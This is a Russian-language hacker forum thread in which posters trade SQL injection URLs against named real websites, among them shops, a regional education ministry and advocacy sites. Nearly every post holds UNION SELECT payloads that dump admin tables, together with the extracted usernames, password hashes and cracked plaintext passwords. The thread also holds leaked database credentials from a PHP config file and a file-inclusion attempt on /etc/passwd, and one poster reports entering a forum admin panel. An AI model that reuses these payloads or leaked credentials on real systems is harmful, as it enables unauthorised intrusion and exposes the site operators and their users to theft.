http://www.pmed.ru/conf/index.php?id=-2376111+union+select+1,2,3,4,5,6,7,8,9,10,11-- странного вида инъекция -)
Мой рекорд по количеству столбцов. Ппц, не думал, что такое встречается... netan_netan@localhost 5.0.51a-community-log
наверно не в тему... низнаю полезно это или нет ну все же http://www .gorenje.ru/ http://www .gorenje.ru/happynewyear/db.inc Code: <?php /* $sqlServer = 'localhost'; $sqlLogin = 'root'; $sqlPassword = 'a123dmin'; $sqlDatabase = 'jar_gorenje'; */ $sqlServer = 'localhost'; $sqlDatabase = 'site'; $sqlLogin = 'site'; $sqlPassword = 'Vie4u'; $sqlHandle = mysql_connect ($sqlServer, $sqlLogin, $sqlPassword); mysql_select_db ($sqlDatabase, $sqlHandle); ?> зы его хостинг http://webhosting-say.hc. ru/ Code: http://www.detki.ru/index.php?mode=gallery&id=-296+UNION+SELECT+1,2,name,4,5,6+from+srv14130_detki.shops-- ничего толком и не нашол((
гитаристам)) http://www.akkords.ru/news.php?nid=-1+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables/* http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,name,member_login_key),4,5,6,7+from+forum_akkords.ibf_members/* http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,login,pass),4,5,6,7+from+admin/* http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,nick,pass),4,5,6,7+from+users/* сонник: http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,database(),3,4,5/* http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,table_name,3,4,5+from+information_schema.tables/* http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,column_name,3,4,5+from+information_schema.columns+where+table_name=CHAR(103,111,114)/*
to KaJIaLL1HuKoB Code: [COLOR=Plum]http://www.detki.ru/index.php?mode=gallery&id=-296+UNION+SELECT+1,2,concat_ws(0x3a,name,activity,addr,phone,email,site,number),4,5,6+from+shops--[/COLOR] Code: [COLOR=Plum]http://new.gazanalyzator.ru/index.php?id=-70/**/union/**/select/**/concat_ws(0x3a,user(),version(),database()),2,3,4--[/COLOR] gazanaly_gazanal@localhost:4.1.22-standard:gazanaly_data Code: [COLOR=Plum]http://www.rifpark.ru/enc/index.php?id=999+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10/*[/COLOR] 4.1.22:[email protected]:wwwrifparkru_wwwrifparkru_wwwrifparkru Министерство образования РК(Республика Карелия) =D Code: [COLOR=Plum]http://minedu.karelia.ru/index.php?id=999+union+select+1,2,concat_Ws(0x3a,version(),user(),database()),4,5/*[/COLOR] 4.0.11a-gamma:kfro@localhost:minedu Code: [COLOR=Plum]http://www.radiolemma.ru/inner.php?t=progs&id=-22177+union+select+concat_ws(0x3a,version(),user(),database()),2,3/*[/COLOR] 4.1.22-community-max:[email protected]:lemma
нашел 2 таблицы: - news - users http://minedu.karelia.ru/devel/index.php?id=999+union+select+1,2,concat_ ws(0x3a,id,login,status),4, 5+from+users/* Code: 1:root:rt 2:julia:wk 3:dmalinov:rt 4:Marina:rt 5:lataki:wk 6:kossuk:wk 7:morozov:wk 8:natalya:wk 9:gold:wk Не могу никак прознать как поле с паролем называется логиниться тут: http://minedu.karelia.ru/login.php ==================================== Карельский Фонд Развития Образования: http://kfro.karelia.ru/index.php?id=13+union+select+1, id,login+from+users/* Таблица по строению такая же как и в министерстве. И лежит все удовольствие на одном серваке, тока в разных базах. Вопрос: Как называется поле с паролем? ==================================== КПМО в Республике Карелия: есть возможность провести include. Тока у меня толком них не получается. Голова уже кипит... http://kpmo.karelia.ru/file/page.php?page_id=../../../../../etc/passwd%00 Че не так то? Это же инклудится; http://kpmo.karelia.ru/file/page.php?page_id=/home/kpmo/www/file/news_62
Ты обрати внимание на вот эту ошибку приписывается расширение .html, ты конечно пытался его обрезать, но на сервере magic_quotes_gpc = On, т.е обрезать расширение не получиться..... Ну а если обратить внимание на первую ошибку: То видно, что сдесь удаленный инклуд, только опять же все портит расширение.....
Итак все таблицы Code: -admins -articles -banners -campaign -categories -config -downloads -feedback -images -pages -prison_images -prisoners -prisons -prs_images -prs_letters -quotes -ticker -timeline Смотрим Admins Code: -admins --username --password --email --level --last_login На Username и password состовляем запрос Code: http://www.cageprisoners.com/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6+from+admins+limit+1,1/* И получаем Frodo:F8wsn.HKddfWfe0eJ.jEV/ SamG:Cn3At9msGsMmHeU.eMzUo0 Gandalf:Uh00xKufkwGB.HWIvgWTv0 чем разшифровывать эти хеши я х.з. поетому кто разшифрует плиз скиньте в личку пассы Кстати пошарив по сайту нашел админку для составления рассылок Code: http://cageprisoners.com/mailman/admin
Итак розбираем ) версия 5 значит смотрим таблицы Code: http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+1,1/* среди них находим нужную _adminusr и смотрим на колонки и находим интерисующие нас pass,username и составляем запрос на чтение Code: http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,concat_ws(0x3a,username,pass),4,5,6,7,8+from+_adminusr/* Получаем результат graphicadmin:10b8e9fc9fc6e8c5d42fb63f948934f6 Пробиваем хеш по базам и получаем graphicadmin:topuser22 Потом сканим сайт на директории и файлы и находим кучи админок http://www.graphicallies.com/admin/ - стоит basic аутидентификация логин и пасс не подходят Нашел ище одну http://www.graphicallies.com/admincontrols/index.php - но опьять же логин и пасс невалидны ище одна форма входа http://www.graphicallies.com:/hitech/userlogin.php - то самое логин и пасс невалидны http://www.graphicallies.com/newtestsite/admin/ -админка в которой ниче нельзя сделать... Где находится админка от сайта или где можна использовать логин\пароль х.з.
Итак приступим. Версия 5 на серве стоит пошарив по сайту нашел пхпббшный форум так что иньекция была проведена буквально за пару секунд запросом Code: http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_users+limit+1,1/* Откуда посыпались акки как переспелые мандарины с дерева ))) взял я все три акка которые были в базе и моим уловом стал Andrey:2c44e4b135929e56f778fadc97077465 Елена Алексеенко:ffae0a5ec97c310be6bb424a35d03cfc Kremniov:c4ca4238a0b923820dcc509a6f75849b Начал проганять хеши через сервисы и только последний был взломан Kremniov:1 попробовав пробить форум на login.php или admin.php я получил кулаком в лоб ни то ни другое не было найдено в дело пошел сканнер и выдал чтото в виде Code: http://www.democracy.ru/admin/ но и тут меня ждало разочарование юзалась примитивная basic аутидентификация ни логин ни пароль от того что имелось не было... А с форумом меня радости не ждало т.к. логин страница была удалена (и нафига им это хотя у них весь форум в спаме...) P.S.Также я прошелся по таблицам в поисках чего нибудь вкусного сразу говорю ниче интересного вы там не найдете (150 таблиц всякого мусора )))
Code: http://www.mibf.ru/index.php?id=37+union+select+1,id,3,4,5,6,7,8,9,10+from+users/* -скуля таблицу и одно из полей подобрал, дальше хз, + не вижу, куда выводятся результаты (в теле страницы вроде нет)
Code: http://www.fun.te.ua/?news=-1+union+select+11,22,version(),44,user(),database()/* user: funteua@localhost database: funteua version: 5.0.45 запись админа из таблицы users: Code: http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,Login,Password+from+users+WHERE+ID=1/* Там еще форум есть phpbb3. Хэш админа: Code: http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,username,user_password+from+forumfun.phpbb3_users+WHERE+user_id=2/*
На форуме валяется два админа Первый Co1T второй ch@os хеш кольта пробивкой по мд5 ниче не дало а вот на ch@os'а мне выдало ch@os:641a668c3d04a7564b278413445808a5 Пробив хеш получилось ch@os:18121985 Логинимся на форуме выбираем админ панель и вуаля!Мы в админке
Code: http://www.samara-sv.info/?static=-1'+union+select+111,user(),database(),version(),555,666/* user - samara@localhost database - samarasv2_main version - 5.0.22-log есть таблица users с двумя записями, вот только неизвестно от чего это Code: http://www.samara-sv.info/?static=-1'+union+select+111,login,passw,user_id,555,666+from+users/* 9 turist ec6d9c8953ab272295ec0469bbed59ab (mountain) 11 budym c645ef64e05f5c5c47e4b204a43b3323 (?)
http://www.laterre.ca/?action=lienSousCat&idLienSousCat=116/**/UNION/**/SELECT/**/1,2,concat(user,0x3a,password),4,5,6,7,8,9,30,31,32+from+mysql.user+limit+1,1/* root:717714425d27f95d
http://www.spakedr.ru Code: http://www.spakedr.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())/* version() - 4.0.24-standard-log user() - [email protected] database() - 4.0.24-standard-logslavalne_joomla Code: http://www.spakedr.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users/* - запрос на логин/пасс/статус админа, но чето он отвергается.
Code: http://www.maljutka.ru/shop/goods.php?id=9+union+select+1,concat(user(),0x3a,database(),0x3a,version()),null,4,5,6,7/* Code: http://www.maljutka.ru/shop/shop.php?id=9999+union+select+1,concat(user(),0x3a,database()),3,4,5,6/* user - [email protected] database - wwwmaljutkaru version - 4.1.22